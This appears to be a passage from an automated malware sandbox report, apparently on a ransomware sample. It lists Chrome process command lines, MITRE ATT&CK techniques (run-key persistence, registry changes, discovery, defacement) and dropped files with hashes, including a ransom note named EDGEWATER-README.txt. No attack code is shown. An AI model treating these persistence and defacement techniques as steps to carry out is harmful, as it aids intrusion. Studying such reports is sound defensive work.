"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=5264 --field-trial-handle=1780,i,12341678486027692466,5559525014331841357,131072 /prefetch:1
2⤵
PID:2964

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=5336 --field-trial-handle=1780,i,12341678486027692466,5559525014331841357,131072 /prefetch:1
2⤵
PID:288

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=3360 --field-trial-handle=1780,i,12341678486027692466,5559525014331841357,131072 /prefetch:1
2⤵
PID:5012

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=5476 --field-trial-handle=1780,i,12341678486027692466,5559525014331841357,131072 /prefetch:1
2⤵
PID:4240

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=952 --field-trial-handle=1780,i,12341678486027692466,5559525014331841357,131072 /prefetch:8
2⤵
PID:1036

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:356

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x218
1⤵
PID:4180

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Defacement

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Recovery\EDGEWATER-README.txt
Filesize
5KB

MD5
f87594f8c275e5e55abb2628c853241a

SHA1
8f2bd665dedcc650796d7e9764c6e18cf0740078

SHA256
b7fa2ab2865f0211eefceefb7ee0adf6db7da03427b7ce3e93d3d1cc913c1f46

SHA512
e80143def50b2ec6fbae1809d8194169ee3af21d919bec951318b8f2928d7171cf7d08a897d408e578e2c642de68549e5a59d9b1c060e0ea75efdd10b67a23c5

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00000a
Filesize
162KB

MD5
44ec03cb3248c903b67751ea27df310a

SHA1
c57e9cf90caf30457e9d57db750b8a0eb8856770

SHA256
d4de4a836d11828dd561db1eb8d7fd48a7e0ce9afd8645e2eabb19a1267b6894

SHA512
657e8958d97eab524224bbd8903e0bd7d0c2640805f77da7546060164fe03f7b6ece99a005ef44e41b7233a2e24ffc63430b2fe3c87f61a1b26e0d7c7e52c365

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize
192B

MD5
d2828adf2270e5b7256dbc04e1c411df

SHA1
58ff0300ed0c2eb0c580b6ea0d1348ee8c579d38

SHA256
9dbfc5d5d6f2d3db3be4a54d0d980eb259f98d5f36e41a1ba77f641afdd291d0

SHA512
4d84404eec7e81d7381e6600dba5cfe2bbec212e30d7e6433208be92e05b0bcb4cbf75a774b67493df3c15b76b48c0958e9cf4d2eb9d007e64b4f28d3394fdad

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize
504B

MD5
acbe208eb56906e4c16f512cae610d70

SHA1
e80c6b3ad3367383958b2bcb308cd078a4eada0f

SHA256
4f124c7e4b6fd4cdfb12986e9bf068aeefa119de9499d361c1e59364a08357b1

SHA512
b3a7aa3370b423dbb5b77a1ecaeddf71db795f39ce19eb6d4d57f2c4962dab17240b127a94b8cf3246d7142b7ab0cfe7d45e24b6f820a07301255ff0a6737991

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\DawnCache\data_1
Filesize
264KB

MD5
c1035f51211c7dfd1ce30a77b0fd4f0e

SHA1
893936af7dc759de32ffb35b037f6bb6fc886e2d

SHA256
5de2dbf86c26b78ee72a838eaeb952fefe84447b29a6f53f0573639317d506ab

SHA512
ba7d4221e18b8ba29c29b8747bc95a8f233af667f6c0ce8a3912bbd4db095ee3379fe2e8f3740888765a2345098ef77fcc62e870d02332afb2fab761516f25d0

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
Filesize
4KB

MD5
d5effb299462dfa25817742b73f54d53

SHA1
2d25ea61dd7e7ccc03fe7af35bc899a7f35f9ff1

SHA256
a7cffe8c42a388f2fd246d1b3514ec20692014d67909783e8a84dfc4b65a8f6e

SHA512
8088f33aaa95bc5bbdc92cb0d7784f1c3ec614092bc2fde36c14991ca0da9b9c5b6baba30dcc1e8b72539d6a97f39694ed0186cb7df82c5e7e638c143f240072

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
Filesize
539B

MD5
0ef6e5f09304473e9c301bfa117735c1

SHA1
05a940d7993ebdc3c45cce34545d31385fd2f5fe

SHA256
9034bcddea661d00a4ddd374d2986b790752feb3e9a0e31092160e1b9fd70e2b

SHA512
ed2c8c29645bb6486c229c40e812ee6e9b885d4e96345ec6ac77ce284a1b9686b810435c1baedf25c0024d8c3d44ed5dedbf3553aec77ff397184b42b8fc189b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
Filesize
875B

MD5
7261ef43b61fcf0e9a39b1a8f078c04b

SHA1
e64f7876c0572ec9dc51e250bbe433ee00cc55f5

SHA256
20b525b280db2e1727b75bd12b005a7e16d3f08a0fc36b146344dad47f093a8a

SHA512
694bbb50bf06965e94746ad1d268ba341a2b8d0ee4cf24b3a45595597e2dc0c0c28527dd4425f2cd5aeb3c49bfc91b53c06249b20fcc879ce0d4c196f23c978a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
Filesize
5KB

MD5
e63786f01975f8271f16a958477e0738

SHA1
43fc3f6b4c9d505acfa5c936643157f65f10cf65

SHA256
57a132ddbb3faec9b4f68c2ff74cc3d47934893ab7a11f8ded871f1136d8094a

SHA512
faf7bae74d12c1c87785996fc35b5863ee50acd96711d89541c1d2e849c5766e25893337f63c198f359bdb47b92c8ac9b029e7406583e6769907f3cced756ad9

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
Filesize
5KB

MD5
07d843d66cf55981719a6a032ee822aa

SHA1
739b99bdf5f9f1b56fc2fa2adb42b9d618569cec

SHA256
f5f33e87d9f3cf86f7acd5f7f6787470ae1c8dfa2922dbdbe7342364d9872d7e

SHA512
16e98ced3ed2497e0b349779e77464d600cf7dc4c35958f84d8a80f590ede8ea17f0a249dcfbdd4ab02a080a96216b7932a3896cc49a62fb8539e775623159eb

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
Filesize
6KB

MD5
900895265d7537167ab1dc68356c1e50

SHA1
4944eb399986842eaae7e7f2fe7ffdc46ab05f06

SHA256
d65eef5894b8138734a89db4e7414031c0d28a076ab97034d5fcfa34b8abad31

SHA512
b4251baa2afa451de8b0120be0814b2b288301b485be28ea29a76338706b1080adeb5fb2004b030cf52caa1bb9d028071662bbf79d2bb5845dbf2144b20ad7e0

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
Filesize
12KB

MD5
340a960775d91f0bb353131095748263

SHA1
e41bd5159036de39960ce04cdc87ce06145e2998

SHA256
d5e1c717f6ad617461b2797bd6bcf92bf0390c83edd329c8ab58f42c49fa89f5

SHA512
5baacf89d02593a4a2f9e7a78a3d4ab301287ea64264d9729f9afe2ccde64874551e963849e04b16f5c94073d229903b76740d68fbc21e717c033e510417d95c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\d754a7b6-d041-4744-acfa-628ab1fabaaf\index-dir\the-real-index
Filesize
288B

MD5
83b3609a3dc0b71682f004d2a4deccff

SHA1
c3a9ce3551c19860eb7a58a4ee39634790256191

SHA256
cf19a9477e22c269c3bf01a1c6e6b2db420f6bdfee15d7bdb31b563869eeacfb

SHA512
8b6cdcc91b4f84e7c6b0fd4827fbe7d14e0ec22b9852f2f2c73ed4055640514db9c3a573f9bf5ba07befd043b92090ee8e046563d240690fdf1b3727d4d254e8

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\d754a7b6-d041-4744-acfa-628ab1fabaaf\index-dir\the-real-index~RFe58a2f2.TMP
Filesize
48B

MD5
7218d149459eafb7336db0b0e01b3e44

SHA1
29ae5f739980aa57542c0ee5f0deac9169154f86

SHA256
30c5aea547c5022a7c9cbb5e17f7cec58720f7b577aee4424168375343509253

SHA512
56b93248b2370f5d97b24c86d4b67b8654c5c0504bd9c7d597006c0985a2cb0447d098275b137b59279a7f9e03d55d12e002ffc5c49a45ce518910078b82e64a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\e95138c7-a381-440c-a22a-e716559291c1\index-dir\the-real-index
Filesize
1KB

MD5
8f1d92e20eaebb35441a1d4b9dd79fd9

SHA1
b5adfb102cf83d2d87d09e147136889b059c4d83

SHA256
b7870289ff170e9c7d88f94e08141fefcf0204c02fbedafdb87d315093a83c9a

SHA512
28329f7390034c6b57a074c39e9c6c752d2e2e0b20cb8754beca4dc854ccc8b2b3bbf4f9d6fff12e8f2dc7878a4f5f630ef0ff62cfb04a896d2fa269fa06f55f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\e95138c7-a381-440c-a22a-e716559291c1\index-dir\the-real-index~RFe58a2f2.TMP
Filesize
48B

MD5
c07a95ff9ce93c3b4db71053a9201e76

SHA1
4c21dbf3dab5f926405da18e570e761ac70b7c5e

SHA256
9f84c393124983fa5d803f585ccdc0b708e4c3baffa6674181493b7f6b559254

SHA512
3b8d1b6d60795a6e910cf017b0bfe0e97acdbcb2c9b3c5e6bbc3a08d42a58d3aae95058e6dca41738ceb80957988bd8384737f2b3dabae71df12fb873f7d2b9b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt
Filesize
176B

MD5
c899c204a7d34f309210461eb17709be

SHA1
304abe92871946dfbb8ac9d809da1806f68a42cf

SHA256
c1b756a8db518e27e0b827ffd1abdad2c581223ae3804f6f2a27c9d042ea72eb

SHA512
46ee7e007af80390da0f4d7eb3bba49061fbfb9bb6115c3f40d7e5da3fd6316005d6cdf3faedf9777cc310789719d23533c97007a29e1550a9b48da6e5a11101

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt
Filesize
112B

MD5
27d332703c2cb6b7874a21ad6c9ee2b1

SHA1
81c4e000746bc63f74af01fd39fd319f47770815

SHA256
aad673587007a5ec27f6b013170e678e190f4c919946ea44c9268a044ce43063

SHA512
82597082be3a3689dea5d113b214ae5687ef7ee48a023d98abb2d79d0759c08990e5980adaa8ac366ff3bf5cc808e5e9182355c67f695ad596fcc78474b84a71

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt
Filesize
187B

MD5
30425431ff17a330c51e90a6ab7d508d

SHA1
cd1c935897d7f4202bd071cb5fb6573ac24bdf9e

SHA256
342291b171fdb2c67e77fc5d4f9b2d678ae5d6ad3a69a6a4295b2f8b8e071435

SHA512
41c08cce7efcf9f697db89a6edaf2c4b6c145e6971d3376286f7dbd16b52df25faa3a5dc7af8bc72a1bb04cc996a80a2de962bfbf75975c8237d73e0c86e8ddb

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt
Filesize
182B

MD5
056fe1ce2592475e8967aacad5585812

SHA1
697b4a32b2408b20449e118152d463fdc06d1fac

SHA256
b8cc69a8a18e3168529c16c2ddc4fb073ee70f1ebfe43d7ca686da65c1f3ade2

SHA512
006c92835ec1ed5f7cf715e3c6a97612134ea8871a6c74ebfae8190dae58fd2befb2f03bc0a64bf2473ffe08b2abd230a8b61534cbf39b37514da43320b39bee

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt~RFe588a78.TMP
Filesize
119B

MD5
16fe36220949a6b402698afe17de28ac

SHA1
a35d9b8d5df79e7650550c6ddaa2b87d4a885ed5

SHA256
f74c3a3121d0957cb2c3212ae58d8eb9455838f69f140813372269f590c7dbb1

SHA512
e6778484fffc73998ae258d21fc8f2df46b8b2673048155252a582593d67a67b9f3eb43367a0a78b6779218b35b56ee6b58246e69dc1bae589bdb03c2d1b401a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\Database\CURRENT
Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
Filesize
96B

MD5
5f616a41b17fac6395a2bf2963578361

SHA1
89b3c24e76cf43353009207d8ec08d2fd7f463de

SHA256
f971c09a483ab2769168706f53af150da996dbae67e3141ac71e0c5154868687

SHA512
b569755cd0451021682daf789341930652849b39709fb43fe6e767664e42047f97b1f91a563c4fcbba020d87fe4fdc2f0b164b446724897d20d6afdce7571325

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe58a2d3.TMP
Filesize
48B

MD5
aef7287c848bbc4136c133b38f723378

SHA1
0b6267fdcd703c76224efc1c56a54dcddfb2d959

SHA256
31ff0e7b7d5d92be4059956b48fd87ad331520f9edaba46c25b69c244c9474f0

SHA512
b05ad679d3e132341cd4d0d1b825acee3718ca58e217baca2d4a8bd8eaf9f73cab2a826bc4ba1c5e272cba123811450b69b7cc33675e9000105214936f0fed47

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
Filesize
158KB

MD5
c84692e8452819536696ecef795da8b2

SHA1
727c995fc0a7be58ac0c11487173590470f1f95c

SHA256
8184beed58e09df06911e7b262cb7ed043915863c2108dfdca2d23c5d1752f2a

SHA512
6b0c2470bfe9f8755feb364844bb49d0c726d88a0baae1a84c8467f30fb4983ca2ff36f958253ee608bee6b55869e47aa0b8a968b2659d8b38aeb4cede37a0c2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
Filesize
158KB

MD5
c8839ddfd0879105a29b697dea8c35a8

SHA1
887df092f61a592d476c35255821047215c937b9

SHA256
e729a959cd0c3c17798cc5e5b5cb27d3b656a0c6db14c9e3a51f125cc4503a51

SHA512
b32a1bbceac9707cdce17deb78f01d4ae33734de5f2cbffd216cb1ee0afecf80a9784ae1fea3ac7f215e030ba350cde343f3d1eb1986010ab336ec59b1308988

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json
Filesize
2B

MD5
99914b932bd37a50b983c5e7c90ae93b

SHA1
bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

SHA256
44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

SHA512
27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_p1mjnnqi.khd.ps1
Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\Desktop\EDGEWATER-README.txt
Filesize
5KB

MD5
f87594f8c275e5e55abb2628c853241a

SHA1
8f2bd665dedcc650796d7e9764c6e18cf0740078

SHA256
b7fa2ab2865f0211eefceefb7ee0adf6db7da03427b7ce3e93d3d1cc913c1f46

SHA512
e80143def50b2ec6fbae1809d8194169ee3af21d919bec951318b8f2928d7171cf7d08a897d408e578e2c642de68549e5a59d9b1c060e0ea75efdd10b67a23c5

Download Submit
\??\pipe\crashpad_3972_RXYZVMOBFRJDQCGU
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/4144-152-0x0000000000A40000-0x0000000000A60000-memory.dmp

Filesize
128KB

Download
memory/4144-252-0x0000000000A40000-0x0000000000A60000-memory.dmp

Filesize
128KB

Download
memory/4144-119-0x0000000000A40000-0x0000000000A60000-memory.dmp

Filesize
128KB

Download
memory/4144-561-0x0000000000A40000-0x0000000000A60000-memory.dmp

Filesize
128KB

Download
memory/4144-120-0x0000000000A40000-0x0000000000A60000-memory.dmp

Filesize
128KB

Download
memory/4144-570-0x0000000000A40000-0x0000000000A60000-memory.dmp

Filesize
128KB

Download
memory/5060-130-0x000002B3B9B10000-0x000002B3B9B20000-memory.dmp

Filesize
64KB

Download
memory/5060-129-0x000002B3B9B10000-0x000002B3B9B20000-memory.dmp

Filesize
64KB

Download
memory/5060-128-0x000002B3D1EE0000-0x000002B3D1F56000-memory.dmp

Filesize
472KB

Download
memory/5060-125-0x000002B3D1D30000-0x000002B3D1D52000-memory.dmp

Filesize
136KB

Download